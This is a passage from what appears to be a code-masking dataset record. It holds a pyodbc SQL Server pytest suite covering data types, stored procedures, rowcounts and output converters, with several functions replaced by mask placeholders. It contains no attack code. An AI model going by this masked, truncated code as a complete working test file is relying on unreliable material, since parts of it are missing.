if encoding:\n v = v.encode(encoding)\n v = v[:length]\n return v\n",
"step-4": "<mask token>\n\n\ndef connect(autocommit=False, attrs_before=None):\n return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=\n attrs_before)\n\n\n<mask token>\n\n\[email protected]()\ndef cursor() ->Iterator[pyodbc.Cursor]:\n cnxn = connect()\n cur = cnxn.cursor()\n cur.execute('drop table if exists t1')\n cur.execute('drop table if exists t2')\n cur.execute('drop table if exists t3')\n cnxn.commit()\n yield cur\n if not cnxn.closed:\n cur.close()\n cnxn.close()\n\n\ndef test_text(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'text')\n\n\ndef test_varchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varchar')\n\n\ndef test_nvarchar(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'nvarchar')\n\n\ndef test_varbinary(cursor: pyodbc.Cursor):\n _test_vartype(cursor, 'varbinary')\n\n\[email protected](SQLSERVER_YEAR < 2005, reason=\n '(max) not supported until 2005')\ndef test_unicode_longmax(cursor: pyodbc.Cursor):\n cursor.execute(\"select cast(replicate(N'x', 512) as nvarchar(max))\")\n\n\ndef test_char(cursor: pyodbc.Cursor):\n value = 'testing'\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', 'testing')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef test_int(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])\n\n\ndef test_bigint(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'bigint', [None, -1, 0, 1, 4886718345, 2147483647,\n 4294967295, 4886718345])\n\n\ndef test_overflow_int(cursor: pyodbc.Cursor):\n input = 9999999999999999999999999999999999999\n cursor.execute('create table t1(d bigint)')\n with pytest.raises(OverflowError):\n cursor.execute('insert into t1 values (?)', input)\n result = cursor.execute('select * from t1').fetchall()\n assert result == []\n\n\ndef test_float(cursor: pyodbc.Cursor):\n _test_scalar(cursor, 'float', [None, -200, -1, 0, 1, 1234.5, -200, \n 0.00012345])\n\n\ndef test_non_numeric_float(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(d float)')\n for input in (float('+Infinity'), float('-Infinity'), float('NaN')):\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 values (?)', input)\n\n\ndef test_drivers():\n p = pyodbc.drivers()\n assert isinstance(p, list)\n\n\ndef test_datasources():\n p = pyodbc.dataSources()\n assert isinstance(p, dict)\n\n\ndef test_getinfo_string():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CATALOG_NAME_SEPARATOR)\n assert isinstance(value, str)\n\n\ndef test_getinfo_bool():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)\n assert isinstance(value, bool)\n\n\ndef test_getinfo_int():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)\n assert isinstance(value, int)\n\n\ndef test_getinfo_smallint():\n cnxn = connect()\n value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)\n assert isinstance(value, int)\n\n\ndef test_no_fetch(cursor: pyodbc.Cursor):\n cursor.execute('select 1')\n cursor.execute('select 1')\n cursor.execute('select 1')\n\n\ndef test_decode_meta(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure column names with non-ASCII characters are converted using the configured encodings.\n \"\"\"\n cursor.execute('create table t1(a int)')\n cursor.execute('insert into t1 values (1)')\n cursor.execute('select a as \"Tipología\" from t1')\n assert cursor.description[0][0] == 'Tipología'\n\n\ndef test_exc_integrity(cursor: pyodbc.Cursor):\n \"\"\"Make sure an IntegretyError is raised\"\"\"\n cursor.execute('create table t1(s1 varchar(10) primary key)')\n cursor.execute(\"insert into t1 values ('one')\")\n with pytest.raises(pyodbc.IntegrityError):\n cursor.execute(\"insert into t1 values ('one')\")\n\n\ndef test_multiple_bindings(cursor: pyodbc.Cursor):\n \"\"\"More than one bind and select on a cursor\"\"\"\n cursor.execute('create table t1(n int)')\n cursor.execute('insert into t1 values (?)', 1)\n cursor.execute('insert into t1 values (?)', 2)\n cursor.execute('insert into t1 values (?)', 3)\n for _ in range(3):\n cursor.execute('select n from t1 where n < ?', 10)\n cursor.execute('select n from t1 where n < 3')\n\n\ndef test_different_bindings(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(n int)')\n cursor.execute('create table t2(d datetime)')\n cursor.execute('insert into t1 values (?)', 1)\n cursor.execute('insert into t2 values (?)', datetime.now())\n\n\n<mask token>\n\n\ndef _test_vartype(cursor: pyodbc.Cursor, datatype):\n if datatype == 'text':\n lengths = LARGE_FENCEPOST_SIZES\n else:\n lengths = SMALL_FENCEPOST_SIZES\n if datatype == 'text':\n cursor.execute(f'create table t1(c1 {datatype})')\n else:\n maxlen = lengths[-1]\n cursor.execute(f'create table t1(c1 {datatype}({maxlen}))')\n for length in lengths:\n cursor.execute('delete from t1')\n encoding = datatype in ('blob', 'varbinary') and 'utf8' or None\n value = _generate_str(length, encoding=encoding)\n try:\n cursor.execute('insert into t1 values(?)', value)\n except pyodbc.Error as ex:\n msg = f'{datatype} insert failed: length={length} len={len(value)}'\n raise Exception(msg) from ex\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef _test_scalar(cursor: pyodbc.Cursor, datatype, values):\n \"\"\"\n A simple test wrapper for types that are identical when written and read.\n \"\"\"\n cursor.execute(f'create table t1(c1 {datatype})')\n for value in values:\n cursor.execute('delete from t1')\n cursor.execute('insert into t1 values (?)', value)\n v = cursor.execute('select c1 from t1').fetchone()[0]\n assert v == value\n\n\ndef test_noscan(cursor: pyodbc.Cursor):\n assert cursor.noscan is False\n cursor.noscan = True\n assert cursor.noscan is True\n\n\ndef test_nonnative_uuid(cursor: pyodbc.Cursor):\n value = uuid.uuid4()\n cursor.execute('create table t1(n uniqueidentifier)')\n cursor.execute('insert into t1 values (?)', value)\n pyodbc.native_uuid = False\n result = cursor.execute('select n from t1').fetchval()\n assert isinstance(result, str)\n assert result == str(value).upper()\n pyodbc.native_uuid = True\n\n\ndef test_native_uuid(cursor: pyodbc.Cursor):\n value = uuid.uuid4()\n cursor.execute('create table t1(n uniqueidentifier)')\n cursor.execute('insert into t1 values (?)', value)\n pyodbc.native_uuid = True\n result = cursor.execute('select n from t1').fetchval()\n assert isinstance(result, uuid.UUID)\n assert value == result\n\n\n<mask token>\n\n\[email protected](IS_FREEDTS, reason=\n 'https://github.com/FreeTDS/freetds/issues/230')\ndef test_nextset_with_raiserror(cursor: pyodbc.Cursor):\n cursor.execute(\"select i = 1; RAISERROR('c', 16, 1);\")\n row = next(cursor)\n assert 1 == row.i\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.nextset()\n\n\ndef test_fixed_unicode(cursor: pyodbc.Cursor):\n value = 'tësting'\n cursor.execute('create table t1(s nchar(7))')\n cursor.execute('insert into t1 values(?)', 'tësting')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n assert v == value\n\n\ndef test_chinese(cursor: pyodbc.Cursor):\n v = '我的'\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n row = cursor.fetchone()\n assert row[0] == v\n cursor.execute(\"SELECT N'我的' AS [Name]\")\n rows = cursor.fetchall()\n assert rows[0][0] == v\n\n\ndef test_bit(cursor: pyodbc.Cursor):\n value = True\n cursor.execute('create table t1(b bit)')\n cursor.execute('insert into t1 values (?)', value)\n v = cursor.execute('select b from t1').fetchone()[0]\n assert isinstance(v, bool)\n assert v == value\n\n\ndef test_decimal(cursor: pyodbc.Cursor):\n for precision, scale, negative in [(1, 0, False), (1, 0, True), (6, 0, \n False), (6, 2, False), (6, 4, True), (6, 6, True), (38, 0, False),\n (38, 10, False), (38, 38, False), (38, 0, True), (38, 10, True), (\n 38, 38, True)]:\n try:\n cursor.execute('drop table t1')\n except:\n pass\n cursor.execute(f'create table t1(d decimal({precision}, {scale}))')\n sign = negative and '-' or ''\n before = '9' * (precision - scale)\n after = scale and '.' + '9' * scale or ''\n decStr = f'{sign}{before}{after}'\n value = Decimal(decStr)\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select d from t1').fetchone()[0]\n assert v == value\n\n\ndef test_decimal_e(cursor: pyodbc.Cursor):\n \"\"\"Ensure exponential notation decimals are properly handled\"\"\"\n value = Decimal((0, (1, 2, 3), 5))\n cursor.execute('create table t1(d decimal(10, 2))')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select * from t1').fetchone()[0]\n assert result == value\n\n\n<mask token>\n\n\ndef test_close_cnxn():\n \"\"\"Make sure using a Cursor after closing its connection doesn't crash.\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('drop table if exists t1')\n cursor.execute('create table t1(id integer, s varchar(20))')\n cursor.execute('insert into t1 values (?,?)', 1, 'test')\n cursor.execute('select * from t1')\n cnxn.close()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('select * from t1')\n\n\ndef test_empty_string(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '')\n\n\ndef test_empty_string_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = ''\n cursor = cnxn.cursor()\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef test_fixed_str(cursor: pyodbc.Cursor):\n value = 'testing'\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert len(v) == len(value)\n assert v == value\n\n\n<mask token>\n\n\ndef test_empty_unicode_encoding():\n cnxn = connect()\n cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')\n value = ''\n cursor = cnxn.cursor()\n cursor.execute('create table t1(s nvarchar(20))')\n cursor.execute('insert into t1 values(?)', value)\n v = cursor.execute('select * from t1').fetchone()[0]\n assert v == value\n\n\ndef test_negative_row_index(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s varchar(20))')\n cursor.execute('insert into t1 values(?)', '1')\n row = cursor.execute('select * from t1').fetchone()\n assert row[0] == '1'\n assert row[-1] == '1'\n\n\ndef test_version():\n assert 3 == len(pyodbc.version.split('.'))\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008, reason=\n 'Date not supported until 2008?')\ndef test_date(cursor: pyodbc.Cursor):\n value = date.today()\n cursor.execute('create table t1(d date)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select d from t1').fetchone()[0]\n assert isinstance(result, date)\n assert value == result\n\n\[email protected](IS_MSODBCSQL and SQLSERVER_YEAR < 2008, reason=\n 'Time not supported until 2008?')\ndef test_time(cursor: pyodbc.Cursor):\n value = datetime.now().time()\n value = value.replace(microsecond=0)\n cursor.execute('create table t1(t time)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select t from t1').fetchone()[0]\n assert isinstance(result, time)\n assert value == result\n\n\ndef test_datetime(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n cursor.execute('create table t1(dt datetime)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5, 123000)\n cursor.execute('create table t1(dt datetime)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_datetime_fraction_rounded(cursor: pyodbc.Cursor):\n full = datetime(2007, 1, 15, 3, 4, 5, 123456)\n rounded = datetime(2007, 1, 15, 3, 4, 5, 123000)\n cursor.execute('create table t1(dt datetime)')\n cursor.execute('insert into t1 values (?)', full)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert rounded == result\n\n\ndef test_datetime2(cursor: pyodbc.Cursor):\n value = datetime(2007, 1, 15, 3, 4, 5)\n cursor.execute('create table t1(dt datetime2)')\n cursor.execute('insert into t1 values (?)', value)\n result = cursor.execute('select dt from t1').fetchone()[0]\n assert isinstance(result, datetime)\n assert value == result\n\n\ndef test_sp_results(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n select top 10 name, id, xtype, refdate\n from sysobjects\n \"\"\"\n )\n rows = cursor.execute('exec proc1').fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_temp(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n select top 10 name, id, xtype, refdate\n into #tmptable\n from sysobjects\n\n select * from #tmptable\n \"\"\"\n )\n cursor.execute('exec proc1')\n assert cursor.description is not None\n assert len(cursor.description) == 4\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_results_from_vartbl(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n Create procedure proc1\n AS\n set nocount on\n declare @tmptbl table(name varchar(100), id int, xtype varchar(4), refdate datetime)\n\n insert into @tmptbl\n select top 10 name, id, xtype, refdate\n from sysobjects\n\n select * from @tmptbl\n \"\"\"\n )\n cursor.execute('exec proc1')\n rows = cursor.fetchall()\n assert isinstance(rows, list)\n assert len(rows) == 10\n assert isinstance(rows[0].refdate, datetime)\n\n\ndef test_sp_with_dates(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\"\n )\n cursor.execute(\n \"\"\"\n create procedure test_sp(@d1 datetime, @d2 datetime)\n AS\n declare @d as int\n set @d = datediff(year, @d1, @d2)\n select @d\n \"\"\"\n )\n cursor.execute('exec test_sp ?, ?', datetime.now(), datetime.now())\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] == 0\n\n\ndef test_sp_with_none(cursor: pyodbc.Cursor):\n cursor.execute(\n \"\"\"\n if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')\n and OBJECTPROPERTY(id, N'IsProcedure') = 1)\n drop procedure [dbo].[test_sp]\n \"\"\"\n )\n cursor.execute(\n \"\"\"\n create procedure test_sp(@x varchar(20))\n AS\n declare @y varchar(20)\n set @y = @x\n select @y\n \"\"\"\n )\n cursor.execute('exec test_sp ?', None)\n rows = cursor.fetchall()\n assert rows is not None\n assert rows[0][0] is None\n\n\ndef test_rowcount_delete(cursor: pyodbc.Cursor):\n assert cursor.rowcount == -1\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('delete from t1')\n assert cursor.rowcount == count\n\n\n<mask token>\n\n\ndef test_rowcount_select(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.rowcount is set properly after a select statement.\n\n pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005\n returns -1 after a select statement, so we'll test for that behavior. This is valid\n behavior according to the DB API specification, but people don't seem to like it.\n \"\"\"\n cursor.execute('create table t1(i int)')\n count = 4\n for i in range(count):\n cursor.execute('insert into t1 values (?)', i)\n cursor.execute('select * from t1')\n assert cursor.rowcount == -1\n rows = cursor.fetchall()\n assert len(rows) == count\n assert cursor.rowcount == -1\n\n\n<mask token>\n\n\ndef test_retcursor_delete(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(i int)')\n cursor.execute('insert into t1 values (1)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\ndef test_retcursor_nodata(cursor: pyodbc.Cursor):\n \"\"\"\n This represents a different code path than a delete that deleted something.\n\n The return value is SQL_NO_DATA and code after it was causing an error. We could use\n SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount\n code.\n \"\"\"\n cursor.execute('create table t1(i int)')\n v = cursor.execute('delete from t1')\n assert v == cursor\n\n\ndef test_retcursor_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(i int)')\n cursor.execute('insert into t1 values (1)')\n v = cursor.execute('select * from t1')\n assert v == cursor\n\n\ndef table_with_spaces(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can select using [x z] syntax\"\"\"\n try:\n cursor.execute('create table [test one](int n)')\n cursor.execute('insert into [test one] values(1)')\n cursor.execute('select * from [test one]')\n v = cursor.fetchone()[0]\n assert v == 1\n finally:\n cursor.rollback()\n\n\ndef test_lower_case():\n \"\"\"Ensure pyodbc.lowercase forces returned column names to lowercase.\"\"\"\n try:\n pyodbc.lowercase = True\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(Abc int, dEf int)')\n cursor.execute('select * from t1')\n names = [t[0] for t in cursor.description]\n names.sort()\n assert names == ['abc', 'def']\n finally:\n pyodbc.lowercase = False\n\n\ndef test_row_description(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure Cursor.description is accessible as Row.cursor_description.\n \"\"\"\n cursor.execute('create table t1(a int, b char(3))')\n cursor.execute(\"insert into t1 values(1, 'abc')\")\n row = cursor.execute('select * from t1').fetchone()\n assert cursor.description == row.cursor_description\n\n\ndef test_temp_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(s char(7))')\n cursor.execute('insert into t1 values(?)', 'testing')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n cursor.execute('select s into t2 from t1')\n v = cursor.execute('select * from t1').fetchone()[0]\n assert isinstance(v, str)\n assert v == 'testing'\n\n\ndef test_executemany(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b varchar(10))')\n params = [(i, str(i)) for i in range(1, 6)]\n cursor.executemany('insert into t1(a, b) values (?,?)', params)\n count = cursor.execute('select count(*) from t1').fetchone()[0]\n assert count == len(params)\n cursor.execute('select a, b from t1 order by a')\n rows = cursor.fetchall()\n assert count == len(rows)\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_one(cursor: pyodbc.Cursor):\n \"\"\"Pass executemany a single sequence\"\"\"\n cursor.execute('create table t1(a int, b varchar(10))')\n params = [(1, 'test')]\n cursor.executemany('insert into t1(a, b) values (?,?)', params)\n count = cursor.execute('select count(*) from t1').fetchone()[0]\n assert count == len(params)\n cursor.execute('select a, b from t1 order by a')\n rows = cursor.fetchall()\n assert count == len(rows)\n for param, row in zip(params, rows):\n assert param[0] == row[0]\n assert param[1] == row[1]\n\n\ndef test_executemany_dae_0(cursor: pyodbc.Cursor):\n \"\"\"\n DAE for 0-length value\n \"\"\"\n cursor.execute('create table t1(a nvarchar(max))')\n cursor.fast_executemany = True\n cursor.executemany('insert into t1(a) values(?)', [['']])\n assert cursor.execute('select a from t1').fetchone()[0] == ''\n cursor.fast_executemany = False\n\n\n<mask token>\n\n\ndef test_row_slicing(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d int)')\n cursor.execute('insert into t1 values(1,2,3,4)')\n row = cursor.execute('select * from t1').fetchone()\n result = row[:]\n assert result is row\n result = row[:-1]\n assert result == (1, 2, 3)\n result = row[0:4]\n assert result is row\n\n\ndef test_row_repr(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(a int, b int, c int, d varchar(50))')\n cursor.execute(\"insert into t1 values(1,2,3,'four')\")\n row = cursor.execute('select * from t1').fetchone()\n result = str(row)\n assert result == \"(1, 2, 3, 'four')\"\n result = str(row[:-1])\n assert result == '(1, 2, 3)'\n result = str(row[:1])\n assert result == '(1,)'\n\n\ndef test_concatenation(cursor: pyodbc.Cursor):\n v2 = '0123456789' * 30\n v3 = '9876543210' * 30\n cursor.execute(\n 'create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))'\n )\n cursor.execute('insert into t1(c2, c3) values (?,?)', v2, v3)\n row = cursor.execute('select c2, c3, c2 + c3 as both from t1').fetchone()\n assert row.both == v2 + v3\n\n\ndef test_view_select(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(c1 int identity(1, 1), c2 varchar(50))')\n for i in range(3):\n cursor.execute('insert into t1(c2) values (?)', f'string{i}')\n cursor.execute('create view t2 as select * from t1')\n cursor.execute('select * from t2')\n rows = cursor.fetchall()\n assert rows is not None\n assert len(rows) == 3\n\n\ndef test_autocommit():\n cnxn = connect()\n assert cnxn.autocommit is False\n cnxn = None\n cnxn = connect(autocommit=True)\n assert cnxn.autocommit is True\n cnxn.autocommit = False\n assert cnxn.autocommit is False\n\n\ndef test_sqlserver_callproc(cursor: pyodbc.Cursor):\n try:\n cursor.execute('drop procedure pyodbctest')\n cursor.commit()\n except:\n pass\n cursor.execute('create table t1(s varchar(10))')\n cursor.execute('insert into t1 values(?)', 'testing')\n cursor.execute(\n \"\"\"\n create procedure pyodbctest @var1 varchar(32)\n as\n begin\n select s from t1\n return\n end\n \"\"\"\n )\n cursor.execute(\"exec pyodbctest 'hi'\")\n\n\ndef test_skip(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(id int)')\n for i in range(1, 5):\n cursor.execute('insert into t1 values(?)', i)\n cursor.execute('select id from t1 order by id')\n assert cursor.fetchone()[0] == 1\n cursor.skip(2)\n assert cursor.fetchone()[0] == 4\n\n\ndef test_timeout():\n cnxn = connect()\n assert cnxn.timeout == 0\n cnxn.timeout = 30\n assert cnxn.timeout == 30\n cnxn.timeout = 0\n assert cnxn.timeout == 0\n\n\ndef test_sets_execute(cursor: pyodbc.Cursor):\n cursor.execute('create table t1 (word varchar (100))')\n words = {'a', 'b', 'c'}\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.execute('insert into t1 (word) values (?)', words)\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.executemany('insert into t1 (word) values (?)', words)\n\n\ndef test_row_execute(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to execute\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n cursor.execute(\"insert into t1 values (1, 'a')\")\n row = cursor.execute('select n, s from t1').fetchone()\n assert row\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.execute('insert into t2 values (?, ?)', row)\n\n\ndef test_row_executemany(cursor: pyodbc.Cursor):\n \"\"\"Ensure we can use a Row object as a parameter to executemany\"\"\"\n cursor.execute('create table t1(n int, s varchar(10))')\n for i in range(3):\n cursor.execute('insert into t1 values (?, ?)', i, chr(ord('a') + i))\n rows = cursor.execute('select n, s from t1').fetchall()\n assert len(rows) != 0\n cursor.execute('create table t2(n int, s varchar(10))')\n cursor.executemany('insert into t2 values (?, ?)', rows)\n\n\ndef test_description(cursor: pyodbc.Cursor):\n \"\"\"Ensure cursor.description is correct\"\"\"\n cursor.execute('create table t1(n int, s varchar(8), d decimal(5,2))')\n cursor.execute(\"insert into t1 values (1, 'abc', '1.23')\")\n cursor.execute('select * from t1')\n t = cursor.description[0]\n assert t[0] == 'n'\n assert t[1] == int\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[1]\n assert t[0] == 's'\n assert t[1] == str\n assert t[4] == 8\n assert t[5] == 0\n assert t[6] is True\n t = cursor.description[2]\n assert t[0] == 'd'\n assert t[1] == Decimal\n assert t[4] == 5\n assert t[5] == 2\n assert t[6] is True\n\n\ndef test_cursor_messages_with_print(cursor: pyodbc.Cursor):\n \"\"\"\n Ensure the Cursor.messages attribute is handled correctly with a simple PRINT statement.\n \"\"\"\n assert not cursor.messages\n for msg in ('hello world', 'ABCDEFGHIJ' * 800):\n cursor.execute(f\"PRINT '{msg}'\")\n messages = cursor.messages\n assert isinstance(messages, list)\n assert len(messages) == 1\n assert isinstance(messages[0], tuple)\n assert len(messages[0]) == 2\n assert isinstance(messages[0][0], str)\n assert isinstance(messages[0][1], str)\n assert '[01000] (0)' == messages[0][0]\n assert messages[0][1].endswith(msg)\n\n\ndef test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):\n \"\"\"\n Complex scenario to test the Cursor.messages attribute.\n \"\"\"\n cursor.execute(\n \"\"\"\n create or alter procedure test_cursor_messages as\n begin\n set nocount on;\n print 'Message 1a';\n print 'Message 1b';\n select N'Field 1a' AS F UNION ALL SELECT N'Field 1b';\n select N'Field 2a' AS F UNION ALL SELECT N'Field 2b';\n print 'Message 2a';\n print 'Message 2b';\n end\n \"\"\"\n )\n cursor.execute('exec test_cursor_messages')\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 1a', 'Field 1b']\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 1a', 'Message 1b']\n assert cursor.nextset()\n vals = [row[0] for row in cursor.fetchall()]\n assert vals == ['Field 2a', 'Field 2b']\n assert not cursor.messages\n assert cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n msgs = [re.search('Message \\\\d[ab]$', m[1]).group(0) for m in cursor.\n messages]\n assert msgs == ['Message 2a', 'Message 2b']\n assert not cursor.nextset()\n with pytest.raises(pyodbc.ProgrammingError):\n cursor.fetchall()\n assert not cursor.messages\n\n\ndef test_none_param(cursor: pyodbc.Cursor):\n \"\"\"Ensure None can be used for params other than the first\"\"\"\n cursor.execute('create table t1(n int, blob varbinary(max))')\n cursor.execute('insert into t1 values (1, newid())')\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 1\n assert isinstance(row.blob, bytes)\n sql = 'update t1 set n=?, blob=?'\n try:\n cursor.execute(sql, 2, None)\n except pyodbc.DataError:\n if IS_FREEDTS:\n cursor.setinputsizes([(), (pyodbc.SQL_VARBINARY, None, None)])\n cursor.execute(sql, 2, None)\n else:\n raise\n row = cursor.execute('select * from t1').fetchone()\n assert row.n == 2\n assert row.blob is None\n\n\ndef test_output_conversion():\n\n def convert1(value):\n return 'X' + value.decode('latin1') + 'X'\n\n def convert2(value):\n return 'Y' + value.decode('latin1') + 'Y'\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int, v varchar(10))')\n cursor.execute(\"insert into t1 values (1, '123.45')\")\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.remove_output_converter(pyodbc.SQL_VARCHAR)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, None)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert1)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is not None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'X123.45X'\n cnxn.clear_output_converters()\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n prev_converter = cnxn.get_output_converter(pyodbc.SQL_VARCHAR)\n assert prev_converter is None\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, convert2)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == 'Y123.45Y'\n cnxn.add_output_converter(pyodbc.SQL_VARCHAR, prev_converter)\n value = cursor.execute('select v from t1').fetchone()[0]\n assert value == '123.45'\n\n\ndef test_too_large(cursor: pyodbc.Cursor):\n \"\"\"Ensure error raised if insert fails due to truncation\"\"\"\n value = 'x' * 1000\n cursor.execute('create table t1(s varchar(800))')\n with pytest.raises(pyodbc.Error):\n cursor.execute('insert into t1 values (?)', value)\n\n\ndef test_row_equal(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(n int, s varchar(20))')\n cursor.execute(\"insert into t1 values (1, 'test')\")\n row1 = cursor.execute('select n, s from t1').fetchone()\n row2 = cursor.execute('select n, s from t1').fetchone()\n assert row1 == row2\n\n\ndef test_row_gtlt(cursor: pyodbc.Cursor):\n cursor.execute('create table t1(n int, s varchar(20))')\n cursor.execute(\"insert into t1 values (1, 'test1')\")\n cursor.execute(\"insert into t1 values (1, 'test2')\")\n rows = cursor.execute('select n, s from t1 order by s').fetchall()\n assert rows[0] < rows[1]\n assert rows[0] <= rows[1]\n assert rows[1] > rows[0]\n assert rows[1] >= rows[0]\n assert rows[0] != rows[1]\n rows = list(rows)\n rows.sort()\n\n\ndef test_context_manager_success():\n \"\"\"Ensure `with` commits if an exception is not raised\"\"\"\n cnxn = connect()\n cursor = cnxn.cursor()\n cursor.execute('create table t1(n int)')\n cnxn.commit()\n with cnxn:\n cursor.execute('insert into t1 values (1)')\n rows = cursor.execute('select n from t1').fetchall()\n assert len(rows) == 1\n assert rows[0][0] == 